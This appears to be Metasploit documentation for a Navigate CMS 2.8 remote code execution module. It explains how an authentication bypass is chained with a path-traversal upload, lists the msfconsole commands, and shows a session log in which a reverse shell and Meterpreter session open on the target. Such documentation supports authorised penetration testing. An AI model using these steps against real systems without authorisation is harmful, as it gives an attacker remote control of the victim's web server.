## Description

This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication.
It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations.
Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely.

This module was tested against Navigate CMS 2.8.

## Verification Steps

[Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip)

## Verification Steps

1. Install Navigate CMS
2. Start `msfconsole`
3. `use exploit/multi/http/navigate_cms_rce`
4. `set RHOST <rhost>`
5. `check`
6. You should see `The target appears to be vulnerable.`
7. `exploit`
8. You should get a meterpreter session

## Scenarios

### Navigate CMS on Ubuntu 18.04

```
msf5 > use exploit/multi/http/navigate_cms_rce
msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
RHOST => 192.168.178.45
msf5 exploit(multi/http/navigate_cms_rce) > check
[*] 192.168.178.45:80 The target appears to be vulnerable.
msf5 exploit(multi/http/navigate_cms_rce) > exploit

[*] Started reverse TCP handler on 192.168.178.35:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 192.168.178.45
[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200

meterpreter > 
```
